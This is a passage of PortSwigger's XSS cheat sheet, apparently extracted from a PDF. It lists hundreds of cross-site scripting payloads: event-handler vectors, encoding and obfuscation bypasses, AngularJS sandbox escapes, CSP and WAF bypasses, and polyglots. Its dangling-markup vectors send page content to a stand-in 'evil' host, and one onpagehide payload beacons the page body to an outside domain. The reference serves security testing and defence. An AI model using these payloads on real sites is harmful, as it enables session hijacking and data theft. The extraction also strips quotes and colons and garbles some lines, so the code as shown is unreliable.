Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
ondragover
Triggered dragging over an element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondragover=alert(1) contenteditablegtdrop hereltxssgt
Compatibility
ondragstart
Requires a mouse drag ltxss draggable=true ondragstart=alert(1)gttestltxssgtCompatibility
ondrop
Triggered dropping a draggable element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondrop=alert(1) contenteditablegtdrop hereltxssgt
Compatibility
onfullscreenchange
Fires when a video changes full screenstatus
ltvideo onfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility
oninput
Requires as change of value ltinput oninput=alert(1) value=xssgtCompatibility
oninvalid
Requires a form submission with anelement that does not satisfy itsconstraints such as a required attribute
ltformgtltinput oninvalid=alert(1) requiredgtltinput type=submitgtCompatibility
onkeydown
Triggered when a key is pressed ltxss onkeydown=alert(1) contenteditablegttestltxssgtCompatibility
onkeypress
Triggered when a key is pressed ltxss onkeypress=alert(1) contenteditablegttestltxssgtCompatibility
onkeyup
Triggered when a key is released ltxss onkeyup=alert(1) contenteditablegttestltxssgtCompatibility
onmousedown
Triggered when the mouse is pressed ltxss onmousedown=alert(1)gttestltxssgtCompatibility
onmouseenter
Triggered when the mouse is hoveredover the element
ltxss onmouseenter=alert(1)gttestltxssgtCompatibility
onmouseleave
Triggered when the mouse is movedaway from the element
ltxss onmouseleave=alert(1)gttestltxssgtCompatibility
onmousemove
Requires mouse movement ltxss onmousemove=alert(1)gttestltxssgtCompatibility
onmouseout
Triggered when the mouse is movedaway from the element
ltxss onmouseout=alert(1)gttestltxssgtCompatibility
onmouseover
Requires a hover over the element ltxss onmouseover=alert(1)gttestltxssgtCompatibility
onmouseup
Triggered when the mouse button isreleased
ltxss onmouseup=alert(1)gttestltxssgtCompatibility
onmousewheel
Fires when the mousewheel scrolls ltxss onmousewheel=alert(1)gtrequires scrollingCompatibility
onmozfullscreenchange
Fires when a video changes full screenstatus
ltvideo onmozfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility
onpagehide
Fires when the page is changed ltbody onpagehide=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt
Compatibility
onpaste
Requires you paste a piece of text lta onpaste=alert(1) contenteditablegttestltagtCompatibility
onpause
Requires clicking the element to pause ltaudio autoplay controls onpause=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onpointerdown
Fires when the mouse down ltxss onpointerdown=alert(1)gtXSSltxssgtCompatibility
onpointerenter
Fires when the mouseenter ltxss onpointerenter=alert(1)gtXSSltxssgtCompatibility
onpointerleave
Fires when the mouseleave ltxss onpointerleave=alert(1)gtXSSltxssgtCompatibility
onpointermove
Fires when the mouse move ltxss onpointermove=alert(1)gtXSSltxssgtCompatibility
onpointerout
Fires when the mouse out ltxss onpointerout=alert(1)gtXSSltxssgtCompatibility
onpointerover
Fires when the mouseover ltxss onpointerover=alert(1)gtXSSltxssgtCompatibility
onpointerrawupdate
Fires when the pointer changes ltxss onpointerrawupdate=alert(1)gtXSSltxssgtCompatibility
onpointerup
Fires when the mouse up ltxss onpointerup=alert(1)gtXSSltxssgtCompatibility
onreset
Requires a click ltform onreset=alert(1)gtltinput type=resetgtCompatibility
onsearch
Fires when a form is submitted and theinput has a type attribute of search
ltformgtltinput type=search onsearch=alert(1) value=Hit return autofocusgtCompatibility
onseeked
Requires clicking the element timeline ltaudio autoplay controls onseeked=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onseeking
Requires clicking the element timeline ltaudio autoplay controls onseeking=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onselect
Requires you select text ltinput onselect=alert(1) value=XSS autofocusgtCompatibility
onselectionchange
Fires when text selection is changed onthe page
ltbody onselectionchange=alert(1)gtselect some textCompatibility
onselectstart
Fires when beginning a text selection ltbody onselectstart=alert(1)gtselect some textCompatibility
onshow
Fires context menu is shown ltdiv contextmenu=xssgtltpgtRight clickltmenu type=context id=xss onshow=alert(1)gtltmenugtltdivgt
Compatibility
onsubmit
Requires a form submission ltform onsubmit=alert(1)gtltinput type=submitgtCompatibility
ontouchend
Fires when the touch screen only mobiledevice
ltbody ontouchend=alert(1)gt Compatibility
ontouchmove
Fires when the touch screen and moveonly mobile device
ltbody ontouchmove=alert(1)gt Compatibility
ontouchstart
Fires when the touch screen only mobiledevice
ltbody ontouchstart=alert(1)gt Compatibility
onvolumechange
Requires volume adjustment ltaudio autoplay controls onvolumechange=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt
Compatibility
onwheel
Fires when you use the mouse wheel ltbody onwheel=alert(1)gtCompatibility
Restricted characters
No parentheses using exception handling ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons
ltscriptgtonerror=alertthrow 1ltscriptgt
No parentheses using exception handling no semicolons using expressions
ltscriptgtthrow onerror=alert1ltscriptgt
No parentheses using exception handling and eval ltscriptgtthrow onerror=eval=alertx281x29ltscriptgt
No parentheses using exception handling and evalon Firefox
ltscriptgtonerror=evalthrowlineNumber1columnNumber1fileName1messagealertx281x29ltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval
ltscriptgtalertx281x29instanceof[SymbolhasInstance]evalltscriptgt
No parentheses using ES6 hasInstance andinstanceof with eval without
ltscriptgtalertx281x29instanceof[Symbol[hasInstance]]evalltscriptgt
No parentheses using location redirect ltscriptgtlocation=javascriptalertx281x29ltscriptgt
No parentheses using location redirect no strings ltscriptgtlocation=nameltscriptgt
No parentheses using template strings ltscriptgtalert`1`ltscriptgt
No parentheses using template strings and locationhash
ltscriptgtnew Function`X$documentlocationhashsubstr`1``ltscriptgt
No parentheses or spaces using template stringsand location hash
ltscriptgtFunction`X$documentlocationhashsubstr`1````ltscriptgt
Frameworks
Bootstrap onanimationstart event ltxss class=progress-bar-animated onanimationstart=alert(1)gt
Bootstrap ontransitionend event ltxss class=carousel slide data-ride=carousel data-interval=100 ontransitionend=alert(1)gtltxss class=carousel-innergtltxss class=carousel-item activegtltxssgtltxss class=carousel-itemgtltxssgtltxssgtltxssgt
Protocols
Iframe src attribute JavaScript protocol ltiframe src=javascriptalert(1)gt
Object data attribute with JavaScript protocol ltobject data=javascriptalert(1)gt
Embed src attribute with JavaScript protocol ltembed src=javascriptalert(1)gt
A standard JavaScript protocol lta href=javascriptalert(1)gtXSSltagt
The protocol is not case sensitive lta href=JaVaScriptalert(1)gtXSSltagt
Characters x01-x20 are allowed before the protocol lta href= javascriptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed inside theprotocol
lta href=javas criptalert(1)gtXSSltagt
Characters x09x0ax0d are allowed after protocolname before the colon
lta href=javascript alert(1)gtXSSltagt
Xlink namespace inside SVG with JavaScriptprotocol
ltsvggtlta xlinkhref=javascriptalert(1)gtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using values ltsvggtltanimate xlinkhref=xss attributeName=href values=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
SVG animate tag using to ltsvggtltanimate xlinkhref=xss attributeName=href from=javascriptalert(1) to=1 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
to 1 a id xss text x 20 y 20 XSS text a
SVG set tag ltsvggtltset xlinkhref=xss attributeName=href from= to=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Data protocol inside script src ltscript src=datatextjavascriptalert(1)gtltscriptgt
SVG script href attribute without closing script tag ltsvggtltscript href=datatextjavascriptalert(1) gt
SVG use element ChromeFirefox ltsvggtltuse href=dataimagesvg+xmlltsvg id=x xmlns=httpwwww3org2000svg xmlnsxlink=httpwwww3org1999xlink width=100 height=100gtlta xlinkhref=javascriptalert(1)gtltrect x=0 y=0 width=100 height=100 gtltagtltsvggtxgtltusegtltsvggt
Import statement with data URL ltscriptgtimport(datatextjavascriptalert(1))ltscriptgt
Base tag with JavaScript protocol rewriting relativeURLS
ltbase href=javascripta-alert(1)gtlta href=lolsafarihtmlgttestltagt
MathML makes any tag clickable ltmathgtltx href=javascriptalert(1)gtblah
Button and formaction ltformgtltbutton formaction=javascriptalert(1)gtXSS
Input and formaction ltformgtltinput type=submit formaction=javascriptalert(1) value=XSSgt
Form and action ltform action=javascriptalert(1)gtltinput type=submit value=XSSgt
Use element with an external URL ltsvggtltuse href=subdomain1portswigger-labsnetuse_elementuploadphpx gtltsvggt
Animate tag with keytimes and multiple values ltsvggtltanimate xlinkhref=xss attributeName=href dur=5s repeatCount=indefinite keytimes=001 values=httpsportswiggernetampsemijavascriptalert(1)ampsemi0 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt
Other useful attributes
Using srcdoc attribute ltiframe srcdoc=ltimg src=1 onerror=alert(1)gtgtltiframegt
Using srcdoc with entities ltiframe srcdoc=ampltimg src=1 onerror=alert(1)ampgtgtltiframegt
Click a submit element from anywhere on the pageeven outside the form
ltform action=javascriptalert(1)gtltinput type=submit id=xgtltformgtltlabel for=xgtXSSltlabelgt
Hidden inputs Access key attributes can enableXSS on normally unexploitable elements
ltinput type=hidden accesskey=X onclick=alert(1)gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements Access key attributes can enableXSS on normally unexploitable elements
ltlink rel=canonical accesskey=X onclick=alert(1) gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Download attribute can save a copy of the currentwebpage
lta href= download=filenamehtmlgtTestltagt
Disable referrer using referrerpolicy ltimg referrerpolicy=no-referrer src=portswigger-labsnetgt
Set windowname via parameter on the windowopenfunction
lta href= onclick=windowopen(httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)alert(1))gtXSSltagt
Set windowname via name attribute in a ltiframegt ltiframe name=alert(1) src=httpsportswigger-labsnetxssxssphp
Set do a e a a e att bute a a e
tagcontext=js_string_singleampx=27eval(name)gtltiframegt
Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt
Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt
Set windowname via usemap attribute in a ltimggttag
ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt
Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt
Set windowname via formtarget attribute in altinputgt tag type submit
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt
Set windowname via formtarget attribute in altinputgt tag type image
ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt
Special tags
Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt
Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 1
+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 2
+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 3
+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-
UTF-7 BOM characters (Has to be at the start of thedocument) 4
+v +ADw-script+AD4-alert(1)+ADw-script+AD4-
Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt
Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt
Disable referer ltmeta name=referrer content=no-referrergt
Encoding
Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt
Unicode escapes ltscriptgtu0061lert(1)ltscriptgt
Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt
Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt
Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt
Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt
Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt
SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt
Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt
Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt
Hex encoding without semi-colon provided nextcharacter is not a-f0-9
lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt
Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt
Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt
HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt
URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt
HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt
Obfuscation
Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt
Data protocol inside script src with base64 andHTML entities
ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt
Data protocol inside script src with base64 and URLencoding
ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt
Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt
Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt
SVG script with unicode escapes and HTMLencoding
ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt
Client-side template injection
VueJS reflected
Version Author Length Vector
All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)
62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt
All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt
All versions Peter af Geijerstam (SwedishShellcode Factory)
37 ltx v-if=_cconstructor(alert(1))()gt
AngularJS sandbox escapes reflected
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
101 - 115(shorter)
Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)
126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)
1227-1229130-1320
Gareth Heyes (PortSwigger) 23 )))alert(1)
130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))
133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=
[]join$eval(x=alert(1))
1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))
1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))
140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))
150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)
79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))
159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()
gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)
33 $onconstructor(alert(1))()
DOM based AngularJS sandbox escapes (Using orderBy or no $eval)
Version Author Length Vector
101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()
1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)
1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()
1227-1229130-1320
Gareth Heyes (PortSwigger) 20 )))alert(1)
140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)
gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()
144 (withoutstrings)
Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)
AngularJS CSP bypasses
Version Author Length Vector
All versions(Chrome)
Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt
All versions(Chrome)shorter
Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt
All versions (allbrowsers)shorter
Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt
120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt
All versions(Chrome)shorter via oncut
Savan Gadhiya(NotSoSecure)
49 ltinput ng-cut=$eventpath|orderBy(y=alert)(1)gt
Scriptless attacks
Dangling markup
Background attribute ltbody background=evil lttable background=evil lttablegtltthead background=evil lttablegtlttbody background=evil lttablegtlttfoot background=evil lttablegtlttd background=evil lttablegtltth background=evil
Link href stylesheet ltlink rel=stylesheet href=evil
Link href icon ltlink rel=icon href=evil
Meta refresh ltmeta http-equiv=refresh content=0 httpevil
Img to pass markup through src attribute ltimg src=evil ltimage src=evil
Video using track element ltvideogtlttrack default src=evil
Video using source element and src attribute ltvideogtltsource src=evil
Audio using source element and src attribute ltaudiogtltsource src=evil
Input src ltinput type=image src=evil
Button using formaction ltformgtltbutton style=width100height100 type=submit formaction=evil
Input using formaction ltformgtltinput type=submit value=XSS style=width100height100 type=submit formaction=evil
Form using action ltbutton form=x style=width100height100gtltform id=x action=evil
Object data ltobject data=evil
Iframe src ltiframe src=evil
Embed src ltembed src=evil
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltsvgonload=++onmouseover=1+[[]+alert(1)gt
Polyglot payload 2 javascript`--gtltnoscriptgtlttitlegtlttextareagtltstylegtlttemplategtltnoembedgtltscriptgtlthtml onmouseover=ampltsvgonload=alert()gt
Polyglot payload 3 javascript--gtlttitlegtltstylegtlttextareagtltscriptgtltxmpgtltdetailsopenontoggle=+`++onmouseover=1+[[]+alert(PortSwiggerRes)gt
WAF bypass global objects
XSS into a JavaScript string string concatenation(window)
window[ale+rt](window[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(self)
self[ale+rt](self[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(this)
this[ale+rt](this[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(top)
top[ale+rt](top[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(parent)
parent[ale+rt](parent[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(frames)
frames[ale+rt](frames[doc+ument][dom+ain])
XSS into a JavaScript string string concatenation(globalThis)
globalThis[ale+rt](globalThis[doc+ument][dom+ain])
XSS into a JavaScript string comment syntax(window)
